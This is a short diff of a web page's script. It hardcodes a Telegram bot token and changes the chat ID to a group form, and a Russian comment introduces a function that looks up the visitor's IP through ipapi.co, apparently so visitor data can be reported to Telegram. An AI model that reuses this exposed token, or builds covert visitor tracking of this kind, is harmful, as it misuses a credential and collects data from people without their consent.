--- a/index.html
+++ b/index.html
@@ -54,7 +54,7 @@
     <script>
         // Конфигурация
         const TOKEN = "8319716117:AAFOvid9L14XanjeBLYWb6JT7QTAVgcA9g4";
-        const CHAT_ID = "1003175777512";
+        const CHAT_ID = "-1003175777512";
 
         // Функция для получения IP через ipapi.co
         async function getIPInfo() {
